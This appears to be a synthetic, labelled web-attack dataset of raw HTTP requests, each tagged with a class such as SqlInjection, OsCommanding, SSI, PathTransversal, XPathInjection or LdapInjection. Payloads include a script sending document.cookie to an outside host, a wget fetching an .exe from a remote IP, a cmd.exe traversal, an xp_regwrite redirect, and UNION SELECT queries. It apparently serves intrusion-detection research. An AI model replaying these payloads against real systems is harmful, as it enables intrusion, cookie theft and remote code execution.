GET /Er/73tresd/JsJY_WUl2urx_Ar/6LfS2Tl3d__execusrS/emassmAorfwent/lZd0qJ.0s0Am5vST.jpeg?wt2bt6all5L3we5=9&5-XqAXTZO=ae1hoTejdTreowot&gcNt=9670173712&rntuc48h1ur5=ndyfEdetdlehsts&gROemeqk=4&how=d6en&aagrneuA=%3Clink++rel%3D+%22stylesheet+%22++href++++%3D++++%22++++javascript%3A++++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.itarve.com%2Fcgi-bin%2Foris.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+++%3E&y0.BmgqUX=wete%26&edivDUZ=0163380777&2tA=254158&mycr=4xtt2&oeoTgrueifen=jnHm5&boot.iniJbiLDfrom4=ttfiel3ed HTTP/1.1
Host: 101.91.144.183
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, deflate;q=0.7, identity;q=0.1, identity
Accept-Language: eS71ir-f, 6it-0Ee601uo;q=0.1
Cache-Control: no-store
Client-ip: 99.202.94.193
Cookie: 177Op0h1aaeb=708327;swdoTwstihk=7JmA
Cookie2: $Version="2"
Date: Thu, 07 Feb 08 23:00:02 UTC
ETag: W/"MCOhL0U7dc0.h29B"
Expect: 100-continue
From: odallu0e@nalp.cz
If-Modified-Since: Sat, 06 Nov 04 06:27:25 GMT
If-Unmodified-Since: Fri, 29 Feb 08 19:40:02 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 28
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ehtw2 teSjse=oaotilii
Range: 2-92,159872-,109519-
Referer: /fsea8hu.css
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.8 (Windows; U; WinNT 2.2; An-Ti; rv:1.6.6) Gecko/23191894
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5276x250
Via: FTP/1.8 14.0.112.33, FTP/5.7 www.aueee4t.tiff, 1.2 108.55.125.76:8
Transfer-Encoding: deflate
Upgrade: paleei/6.9, pyefh/6.3, aeu/0.2
Warning: 994 www.tlp8eHc.js "tnRTM0oe" "Fri, 07 Sep 07 09:29:11 CET"
X-Forwarded-For: 72.155.7.72
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48125
Start - Id: 50072
class: XPathInjection
POST /GechoHpJ/qKQCL@M7HOtmpr4m/tuIo37jlc0qt3N/dJ2L3W3Jqs97Nw3/R1r9nldethwesicu/lcreabotmeee/fo5gydm/jU0bAZ.nKb9.jpg? HTTP/1.0
Content-Length: 219
Content-Language: n3xb68
Content-Encoding: compress
Content-Location: /hy1a.mspx
Content-MD5: ZTVlY2ZBc3NsdG5uZWltbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 Sep 07 06:22:53 UTC
Last-Modified: Wed, 07 Jan 09 16:02:15 CET
Host: 144.82.179.101
Connection: 7esstmr
Accept: application/x-tar;q=0.5
Accept-Charset: big5;q=0.8, macintosh
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=585
Client-ip: 52.121.59.129
Cookie: eea4ittiu=s;ceAoh1l16s=BnorHlat'     or     path/child::node()[position()=N]  or 'rEern' =  '
Cookie2: $Version="8"
Date: Mon, 14 Feb 05 02:21:01 UTC
ETag: W/"OUNTwF9l.xV39@6x91pF"
Expect: e4tta
From: edaaisla@oe0taiade.biz
If-Modified-Since: Fri, 22 Sep 06 18:10:19 UTC
If-Unmodified-Since: Mon, 26 Mar 07 08:51:00 GMT
If-Match: *
If-None-Match: "cysrTGRwNUHWCn83"
If-Range: "WjOz4SW4bzWo6VABa"
Max-Forwards: 31
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest username="7btlnr"
Authorization: Digest nc=7708f34C
Range: 8-
Referer: /akhmt/dilsin/afteslcq.pdf
TE: chunked,deflate;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/1.8 (compatible; MSIE 9.0; Solaris; rtetG)
UA-CPU: MIPS
UA-Disp: 6398,9541,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 254x290
Via: 6.4 220.172.231.118
Transfer-Encoding: 4oid; nE1e=ocan
Upgrade: h7qu/9.3, emae4/9.5, 0nugh/4.3, hA8sm/7.8
Warning: 827 251.29.25.85 "odteiapo" 
X-Forwarded-For: 109.8.17.168
X-Serial-Number: 7706137339347
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

c-WVMKI=aarroo~e0dbvsltmpyse&te=12508102&eitmeamanplt=<ne&&EmcmhoHolhEee=vqr]zji Hl6&e9ihfviDdArys=s=hxuee2liken &Sao=35&vC8O4img1axJ=5933&cHS53MbetweenRg=ocat9&ZU-@IreplaceEYUwp-b=ar01ubHbKbg@&crha0kt=se;

End - Id: 50072
Start - Id: 44518
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 166.139.219.224:80
Connection: pi89naso
Accept: */*;q=0.4
Accept-Charset: iso-8859-8-i, utf-7
Accept-Encoding: *
Accept-Language: ewtr-oirtt
Cache-Control: min-fresh=422
Client-ip: 108.61.204.42
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="4"
Date: Tue, 19 Aug 08 15:47:55 GMT
ETag: "6.58tUusJo7_pzi8ZM"
Expect: 100-continue
From: bsntalu@ofn3s.de
If-Modified-Since: Thu, 02 Feb 06 24:38:40 CET
If-Unmodified-Since: Fri, 16 Mar 07 04:57:32 CET
If-Match: *
If-None-Match: "6mtLE695gjWc2wdkPTH5"
If-Range: "bd@HfnPBbLlSruUn"
Max-Forwards: 89
MIME-Version: 8.3
Pragma: iitshoiw='uae'
Proxy-Authorization: NTLM dzRtb3JPZWRyZ2FlSVNwVWRpTG5hbWNvZXRjc2F0YkFhdXk3dXZj
Authorization: ienbeh ieerread=snqackgo
Range: 0-753213
Referer: /ntene/ySpuUnh/oh2uou/Yl1Dedu.php4
TE: trailers
Trailer: Warning
User-Agent: Mozilla/2.6 (X11; U; Linux i586 9.5; nn-Se; rv:3.1.4) Gecko/81223106
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 455x841
Via: FTP/8.0 224.201.12.254, HTTP/6.2 162.188.248.208
Transfer-Encoding: compress
Upgrade: c3oe/1.8, sib/4.3, apenZ/1.3
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44518
Start - Id: 39536
class: SSI
GET /geareu1nettitepurana/aaAnmcrdq2sfoey6Cme/DtbJOfeaH/vbscriptkFgXV/t4/uo7dlhfai5cm30/8k/diuRtawto/O6yttuogo.gif?megbPlmhaeeefr=enU&6jb=figfNeresAo5&DnbN2Gz=2044119&atthhS2sswChBjr=3 HTTP/1.1
Host: 144.199.171.121:82513
Connection: p25l
Accept: audio/*, audio/basic
Accept-Encoding: 
Accept-Language: 3waas-l;q=0.5
Cache-Control: no-transform
Cookie: hk-B=969016774;73aa=<!--    #include  virtual="/var/log/httpd/access.log"   -->;mdphafieOeaOytF=)aehatf? ofild
Date: Mon, 22 Mar 10 13:04:31 GMT
If-Modified-Since: Sun, 26 Apr 09 15:16:22 CET
If-Match: "z-K1xwhYn3eR@wwK3"
If-Range: *
Max-Forwards: 0
Authorization: NTLM ZWlBMGVlYW10b2F0bmZvYWl1Z3NlM3lpOERldHAwaVRzdHRlb3Z1aVRucm8=
Referer: /aainto/a5u9/eer4.php4
User-Agent: Mozilla/5.8 (Windows; U; WinNT 6.2; rd-se; rv:9.4.4) Gecko/56186375
Transfer-Encoding: identity

null

End - Id: 39536
Start - Id: 45127
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: www.5ieuyE.st
Connection: asehyc4
Accept: image/*;q=0.1, text/html, text/html;q=0.9
Accept-Charset: x-mac-arabic;q=0.5, euc-tw, windows-1257, x-mac-arabic, ks_c_5601-1987;q=0.5
Accept-Encoding: compress;q=0.5, identity, deflate, deflate;q=0.7
Accept-Language: as4eafa-etocil0, atev-ft
Cache-Control: min-fresh=423
Client-ip: 223.196.253.50
Cookie: htrm7rNhnib=lslek;trM=uooDI~wp-ydfdn;sne=311842;homeuUiqV.NZk=91616317;wOmoPvl=691609;retst=t-Wt9tnmX
Cookie2: $Version="030"
Date: Sun, 22 Oct 06 01:31:07 CET
ETag: W/"d3mNFnIN_1gDH9-Xe0"
Expect: Leorvry
From: 9enav3e@om2hoy4hd.cz
If-Modified-Since: Fri, 24 Aug 07 20:57:26 GMT
If-Unmodified-Since: Thu, 08 Apr 10 20:05:06 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Dec 09 23:16:24 UTC
Max-Forwards: 1549
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Basic dHQwSWFicjo3c2FpYXM=
Range: -3,456-488022
Referer: /nHon/zienrtss.jpg
TE: gzip,chunked;q=0.0
Trailer: Host
User-Agent: rdhsLb/3.5.7
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0464x327
Via: 5.5 120.26.172.133
Transfer-Encoding: gzip
Upgrade: srsd/2.9, nNisSb/2.9, eTj/8.9
Warning: 694 75.28.35.212 "sieenweirr1p" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: -------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45127
Start - Id: 40549
class: SSI
GET /omhbLiaGxseac9qef/autoexecl-CHGCgy/oytnaCjsaybi9sre/ms-.cgi?fbklgha5sh=9&iyyi4pa5notsu5N=6&ve=7nyaohor%3D&irjfr=positionm0%3AAshsRa&mcf=ae0o&f97ormtgzjJ=an%2Boaib9%27iftp9&g1y0fDmn6=7013&lwn=%3C%21--+++++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&1gslTsohiaslond=nanjdRbe HTTP/1.1
Host: 59.187.99.185
Connection: rotHAoE
Accept: */*;q=0.7
Accept-Charset: x-mac-korean, x-mac-korean;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 32.122.234.119
Cookie: bjp=ddssftalt|t'iDi1jt
Cookie2: $Version="45"
Date: Mon, 09 Feb 04 04:00:49 UTC
ETag: "jnUwgr1CydoaN3UHm.bx"
Expect: 100-continue
From: dllx8s1@F9aYw68.biz
If-Modified-Since: Tue, 07 Feb 06 14:38:37 UTC
If-Unmodified-Since: Sun, 30 May 04 09:06:31 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8841
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: eyuU tZee=sndi
Authorization: uhoI ah7yoa7o=nnhehre
Range: 85-,28138-
Referer: http://www.oIry.biz/rtl7oy/9aEta4l/cuoem4.php3
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: zydvSx0b http://www.teList9g.it
UA-CPU: MIPS
UA-Disp: 5247,6150,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0457x8183
Via: 3.5 www.de66.jpeg
Transfer-Encoding: gzip
Upgrade: enoi6/9.0, nmeG/6.4, qlt/3.9
Warning: 564 www.dt5nmh.gif "yhcyTbTnls0" 
X-Forwarded-For: 172.8.17.63
X-Serial-Number: 9009184147
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40549
Start - Id: 38623
class: LdapInjection
GET /eZ@.html?enlsnuolALigmct=5TEaenDbHaWoewyide&ko2meEeEid3i2rt=%29+++%28++%7C++++%28tcsnn%3Dhu56x*%29 HTTP/1.1
Host: 218.139.182.37
Connection: rdhsyE
Accept: text/plain;q=0.5, application/x-tar;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 146.170.36.188
Cookie: eDSoglauaoist0i=flGMlhWDa;ee=hut
Cookie2: $Version="788"
Date: Fri, 29 Jun 07 14:51:09 UTC
ETag: W/"78VQV6Gzdd4iSe."
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Wed, 02 May 07 18:39:13 GMT
If-Unmodified-Since: Mon, 01 May 06 24:03:05 GMT
If-Match: "W4.rIA7vEAvEOAD6wva7"
If-None-Match: *
If-Range: *
Max-Forwards: 217
MIME-Version: 8.5
Pragma: ik=fo0f
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: i4mhnl mnihnewe=N2rh
Range: 907-3621,092-84571,369-460
Referer: /s3to/d3irgs.ace
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/2.4 (X11; U; Open BSD i386 7.9; 92-h6; rv:4.7.7) Gecko/09821816
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/0.9 137.63.203.23, Raae/5.9 www.alf7.js, 8.4 69.166.218.179
Transfer-Encoding: identity
Upgrade: legAa/6.2, aea/3.6, 9ebe/1.1, coNl/5.9
Warning: 385 www.ietrrth1.htm "wefuh94ogoiYectles" 
X-Forwarded-For: 103.229.175.133
X-Serial-Number: 325446948
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38623
Start - Id: 44755
class: PathTransversal
GET /tfO9NDnL.shtml?8it0ples=as9lV&uo=nohyhr%7Evbscript%29ynmowindow.open&naDohn=.%2F..%2F.%2F..%2F.%2F..%2F.%2F..%2F&qGZ5Miframe2=nZlp8tAettenystost&2tQmocha=057 HTTP/1.0
Host: 225.218.23.252:80
Connection: he1rnsh7
Accept: video/*, image/jpeg;q=0.7
Accept-Charset: euc-tw, euc-jp, windows-1257
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=78052
Client-ip: 245.254.197.131
Cookie: Ckboot.ininboot.iniA-2=tntREor7feqoafro;aajAeLvpNeLat=20777;mmnc=182067375;1dheeiSqO=rAp;ugnodiiStb=5 0dpsR9dqA5dtRoae;lXuprN9gb= hsaucansaicne
Cookie2: $Version="28"
Date: Mon, 02 Nov 09 12:49:09 CET
ETag: W/"xb-ZO.Nm0QQKMM6"
Expect: ammm
From: 6R4thu@ercn3stwaa.biz
If-Modified-Since: Thu, 15 Apr 04 13:45:47 CET
If-Unmodified-Since: Fri, 13 Nov 09 11:51:37 CET
If-Match: "Al_M2p86uSFudm_HScc-"
If-None-Match: *
If-Range: *
Max-Forwards: 48
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest qop=auth
Range: 484-6716,4-82,-34
Referer: /tSoZftL/dortctIi/utdt/4eefreoM.nsf
TE: chunked;q=0.4
Trailer: TE
User-Agent: g6h9T_ http://www.tatvi.org
UA-CPU: x86
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7624x8326
Via: 6.4 212.103.232.30, fir/7.4 www.8nyllt7r.png, 9.4 www.eocwyseg.shtml
Transfer-Encoding: cdeup1
Upgrade: ene/3.3, dnense/3.4, iDe8je/2.2, ecTeud/6.4, a7yhir/5.9
Warning: 707 233.213.218.176:22416 "2pjtanyoNbt" "Mon, 22 Mar 10 21:57:09 UTC"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 66520697255736682
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44755
Start - Id: 40426
class: SSI
PUT /gpositionR_5Kl0U/Ao/oyDcTU5GTqzT7x-YhwJ/wldRdemtR3u/5RSEeUiVAqc6kam8X/6tu31s/mibT/qaeoiy/oEdledtdo.php4? HTTP/1.1
Content-Length: 136
Content-Language: eteb,o,x4tnne
Content-Encoding: identity
Content-Location: /bedlsr/3aqqy/sLmst/3iwe0uff.gif
Content-MD5: bnNrU2NpZXNqcmFPdGVubg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 17 Sep 05 11:40:39 GMT
Last-Modified: Fri, 07 Mar 08 15:45:09 CET
Host: www.dora7367lS.org
Connection: keep-alive
Accept: video/mpeg;q=0.3, application/x-tar;q=0.7
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.9, deflate;q=0.2
Accept-Language: *;q=0.2
Cache-Control: no-transform
Date: Mon, 03 Jul 06 16:03:31 CET
ETag: W/"Gtc66qHLMq56WpI2"
Expect: 100-continue
If-Modified-Since: Fri, 09 Sep 05 22:49:29 GMT
If-Unmodified-Since: Thu, 29 Jan 09 15:04:52 GMT
If-Match: *
If-None-Match: "mf-wohzienDbLcwm"
If-Range: *
Max-Forwards: 5
Pragma: no-cache
Authorization: NTLM NWV1c2U0dDJhbzFpb2VuaWEyc24ydzR0T0h4YTBtc2RpTGg=
Referer: http://aAntt8gu.de/eleoe.asp
User-Agent: Adaei0say/4.5.1
Via: HTTP/6.6 142.47.250.210, 1.5 80.222.31.116, 1.8 189.211.54.57
Transfer-Encoding: atdgel; uoYnr=aNbne
X-Forwarded-For: 55.189.138.51

Oneeojs2J=yoeosatmpad&crmIz2rba=<!--  #include   virtual="c:\winnt\system.ini"   -->&ra=sqmH\5p&mliinhw=eays5ruv2r

End - Id: 40426
Start - Id: 42164
class: SqlInjection
GET /lII8rUivPv@wXip/ciN62xU5f-2dCXK/pqwhereh27m6jor8k8/isot71tsltrr0w/aMv89W@-pQL5.zIglP5/uc/mia.msf?qe=3387+++++or+++id%3E3++++or++++ls_id%3C687117&rt=%28%3Alllsnfrom80rr&jjoitmset2r=a4taom8otshglwtaxn&2nrndth9oj6aya=0490&tg=378&aiwC1ihecna=%3B+qynlusraj8sopy++l&oIowe=An%7Celr3n+hlrpgl&cw20ol2en4tl=hhq&tuiayaoOu=roiaae&useHep=dlfb6iDaoy6ndl&ryohnttuhrHtlnt=etIOin&eehkrbn2T=oeheeteT&vddytd=600&Ejs=270497&iioBea4ousg=2 HTTP/1.1
Host: www.etoeotnss.com
Connection: close
Accept: image/*;q=0.8, audio/*, image/png;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 45.250.133.235
Cookie: iitbtsprt=amotezuo;tmlehs=so-U6d1;eaearenxnosh=8855;teapl=leiwf9esruts;Be0idytQa8=9242822865;ldw85os3Iotx7h=8453076
Cookie2: $Version="82"
Date: Tue, 02 Jan 07 02:07:04 CET
ETag: W/"q9@-@42oTbHORdulE04"
Expect: 100-continue
From: tktabU@4ahlq0ig.org
If-Modified-Since: Tue, 16 Jun 09 16:27:33 CET
If-Unmodified-Since: Thu, 22 Dec 05 17:19:08 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Aug 09 16:33:58 GMT
Max-Forwards: 5
MIME-Version: 5.9
Pragma: tyn1nq='pC3'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest qop=auth
Range: -65233,-6365
Referer: http://www.jpal1r5b.ch/Lito/8rb2re.gif
TE: chunked,trailers
Trailer: From
User-Agent: eaodon9yrtuodm
UA-CPU: StrongARM
UA-Disp: 234,2266,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: HTTP/2.3 135.248.50.115
Transfer-Encoding: rnsgfm; 4o7ut=xhry
Upgrade: tNMgnj/4.8, 6nig/6.9, f01otg/5.4
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42164
Start - Id: 36832
class: OsCommanding
GET /resj/siM989i3yf@S.shtml?N3n=dreftmsam&Rag2H6sP4BV=677976&OldpX5PJXO-=sgsms&rtcuanbiMlrr=dth&nao=%5Cn++wget+++++http%3A%2F%2F174.28.255.167%3A48%2Fnftp.exe&mANjJmobapet=%2FghEtcg0yI&tke=306481252&tdn=69903027&teree=05441 HTTP/1.0
Host: www.mseneceinr.uk:9
Connection: wtOrh
Accept: video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.4, deflate;q=0.5, deflate;q=0.2, compress
Accept-Language: mnnr-bieqr7de, ebeb5iud-d;q=0.8, oowdha-u640f, aa1o-enfj5;q=0.2
Cache-Control: gertyOn=dethNyeh
Client-ip: 22.63.188.165
Cookie2: $Version="430"
Date: Mon, 10 Jul 06 01:15:40 GMT
If-Modified-Since: Thu, 05 Feb 04 02:48:02 UTC
If-Unmodified-Since: Mon, 17 Mar 08 20:39:27 UTC
If-Match: *
If-None-Match: ".0p2GaRBocvajjP"
If-Range: Fri, 08 Aug 08 20:43:28 CET
Max-Forwards: 7
Pragma: no-cache
Authorization: Digest username="ugnls7"
Referer: http://9hss.it/rpeeiae/oanit/ZeeDs7yh/h4eqc.php
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.8 (Machintosh; U; PPC 2.2; ot-an; rv:7.7.0) Gecko/54076184
UA-CPU: PowerPC
UA-OS: Linux
Via: HTTP/9.6 www.dAbae6.jpg, estAtA/2.3 51.102.213.86, 8.2 142.86.183.7
Transfer-Encoding: deflate
X-Serial-Number: 578477584151
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36832
Start - Id: 41387
class: SqlInjection
PUT /WsTkpy0IdrchildSA/e@upAuE-sYUp/oGxMV.S@.Vx/8a5/et/Or5enirqghuOcrhi/zRee/Mesluiio9fId/u.TBNz/tt92o.swf? HTTP/1.0
Content-Length: 257
Content-Language: eb7oe
Content-Encoding: compress
Content-Location: http://www.omhr59tm.uk/whuSiumI/sise/ipyQ3Tel.mspx
Content-MD5: dW50cmdjZGpPZWN6OWV2Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 May 09 17:46:30 GMT
Last-Modified: Fri, 10 Jun 05 05:53:35 CET
Host: www.9bt6te2st.be
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1255
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 65.244.212.38
Cookie: sedAn=hbgooruwreHut4Osnl;ef3taeRjEyT3eu=opep2ettqhqcee;oi=r8@rY9rL;rs=4445;ufcuTo=snae;rqless4=rai
Cookie2: $Version="753"
Date: Sun, 03 May 09 10:20:31 UTC
ETag: "8SIu.AFvTvU3KcHdVRD"
Expect: Nerh01=hehmt9
From: eFdpx@Molwro.de
If-Modified-Since: Fri, 20 Jun 08 07:08:22 UTC
If-Unmodified-Since: Fri, 31 Aug 07 08:01:52 GMT
If-Match: "BimErZCRw1xWyOYQ"
If-None-Match: *
If-Range: "HB64axQpcWVoMO5qTqJ"
Max-Forwards: 22
MIME-Version: 2.2
Pragma: osd='1k75ipmn'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Digest opaque="trcsbree"
Range: -9924,02717-,6-82569
Referer: http://www.7na2e9ae.be/mLlIiia/aLend/l2tetsn/2Nzvtalo.cgi
TE: chunked;q=0.2
Trailer: Accept-Language
User-Agent: iu7eloCc/6.6.6
UA-CPU: 68000
UA-Disp: 727,089,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1178x5140
Via: rhlswi/0.0 179.26.152.175
Transfer-Encoding: deflate
Upgrade: bwir7/9.5, 0rA2/5.4
Warning: 978 www.aeers.png "pstsl2qua0E" "Sat, 06 Mar 10 21:32:52 GMT"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

ieIs=6000941&gdsenepuveaeeos=47&lDjNAt7.-=4004&SR1Eivari97_=asmso2he&silenehla0Erns=16&Tl9i4r=65214173&hspla=de3sxi3CVd&aefI9h3mrxAtem=chairs'   UN/**/ION    SEL/**/ECT     ubev3rfgea FROM   dba_users  WHERE    et2e like '%25&ashwaneOe=rngxavu

End - Id: 41387
Start - Id: 41166
class: SqlInjection
PUT /7J-ONale14kKUoIe5U/0m6moaisi/PMC-twxn5QM/eN3cttqvoW49dLK5k/s7YDCfg.Z.9Y6/a9yRIS0dGk/traaehi0idweirW/thnlFrneo/_-lyBWEGJ/s2cymqSCvJ.html? HTTP/1.1
Content-Length: 30
Content-Language: zip
Content-Encoding: deflate
Content-MD5: aG5pNUN1YWl1YW1kb240bA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 06 Sep 07 08:19:58 UTC
Host: www.zDlHieaesA.org:680
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: exec    xp_regwrite     'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','ss','REG_SZ','DBMSSOCN,hackersip,80'
Cache-Control: max-age=544
Date: Sat, 15 Oct 05 13:54:24 GMT
If-Modified-Since: Sun, 08 Jul 07 20:37:11 CET
If-None-Match: *
Referer: http://leati.biz/tryeiyet/6sni/ctmh8.js
User-Agent: Mozilla/4.2 (X11; U; Linux i386 1.5; rt-re; rv:1.4.9) Gecko/18811306
Transfer-Encoding: gzip

63Orsdeonmrri=ageekiaeuan9qtii

End - Id: 41166
Start - Id: 36680
class: OsCommanding
GET /ubsRyENnCLcY-6/Nlrl.cfm?lsNfitnr6=2&lv7uLeenEh1=934&Orwahnaaiheil=6+et4 HTTP/1.1
Host: 188.94.223.196:80
Connection: close
Accept: text/html;q=0.5, application/rtf
Accept-Charset: x-mac-arabic, euc-tw, us-ascii, iso-8859-8-i;q=0.2
Accept-Encoding: 
Accept-Language: icroh5t-xsef;q=0.7, n-objid;q=0.5, Rhi0nhcr-e, 6t-le;q=0.1, eyadrne-hrds8lR6;q=0.2
Cache-Control: min-fresh=2
Cookie: thgnmrkiL=\n    uftp    -p   www.setrmaleat.com    /leer/verororont/ie/teitit/tani/alrail;aedirbhzkwtq=nezy;66Sa=tnee
Cookie2: $Version="82"
Date: Sun, 22 Jun 08 04:12:31 UTC
ETag: "wy@OzR52T2wQnQtS"
Expect: eo7ptt=i1erHed;eEedOtn
If-Range: *
Max-Forwards: 9
Authorization: Basic TmFvMWQxczpvdHRvZWFLRQ==
Referer: http://www.ndesc8Z.de/nE9Ure/finc.pl
User-Agent: Mozilla/4.3 (X11; U; Open BSD i386 0.6; e6-fa; rv:7.4.1) Gecko/71799258
Warning: 690 185.253.94.244 "Garhr" "Tue, 09 Jan 07 24:46:57 UTC"
----: --------------------------------------------

null

End - Id: 36680
Start - Id: 50032
class: XPathInjection
PUT /rdUjvSb/adminIexzqDmail/3xcIrr1iafieaz9T/sceino9qsdilr/hKeZ@wHLrIJ0O7T4TQ/3zKvrnolitoK9vukj22/Rrw/poUzeR14fcmv4p951_/nnojeds9s/uhsto1e/ers0ufsan/nQq@AqK.tiff? HTTP/1.0
Content-Length: 277
Content-Language: waho,mihp3bI
Content-Encoding: identity
Content-Location: /ldncUry/oiats/IsSectv/schrn.mspx
Content-MD5: OHRlZXdFdGUwd2pybWhveQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 31 Jan 05 09:38:49 UTC
Last-Modified: Mon, 02 Mar 09 04:04:49 UTC
Host: www.d8lOs83.it
Connection: eano
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: 19039   or    nhor/aln4qi/nne/child::node()[position()=071]  or    61186=
Accept-Language: *;q=0.4
Cache-Control: ijvtr='6e'
Client-ip: 136.198.187.156
Cookie: I4twad=mpKuifZb.Kqt
Cookie2: $Version="734"
Date: Tue, 29 Jun 04 02:41:54 UTC
ETag: W/"yyt43CUFH-A.9leO4.T"
Expect: 100-continue
From: nedh@e0uheaoepd.com
If-Modified-Since: Fri, 02 Sep 05 02:47:05 GMT
If-Unmodified-Since: Sun, 16 Jan 05 08:43:29 UTC
If-Match: "KMzcNG87pSHr.PRv"
If-None-Match: "V01Y.j@Ci2f5JIt5"
If-Range: Tue, 29 Jan 08 22:34:11 UTC
Max-Forwards: 5078
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic b290cWFrazpycm1vaWI=
Authorization: NTLM aGxmc2lyZGdlcmVvMnRhaXJhc2tudThDbGV4YXllZW9ucG5zOTJ0Nw==
Range: 13170-
Referer: /eyblovae.jpeg
TE: trailers,gzip;q=0.4
User-Agent: Mozilla/8.3 (Windows; U; Windows NT 8.8; ed-de; rv:7.8.5) Gecko/06735157
UA-CPU: StrongARM
UA-Disp: 410,481,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 412x6538
Via: HTTP/8.1 www.tihaiiot.jpg, mstlc/6.6 103.227.255.2:9, FTP/7.0 188.82.141.213
Transfer-Encoding: aDoges
Upgrade: afwctk/7.8, nfmte/1.2
Warning: 216 60.91.104.152 "dhresrh30etsr" "Tue, 28 Apr 09 18:34:12 CET"
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

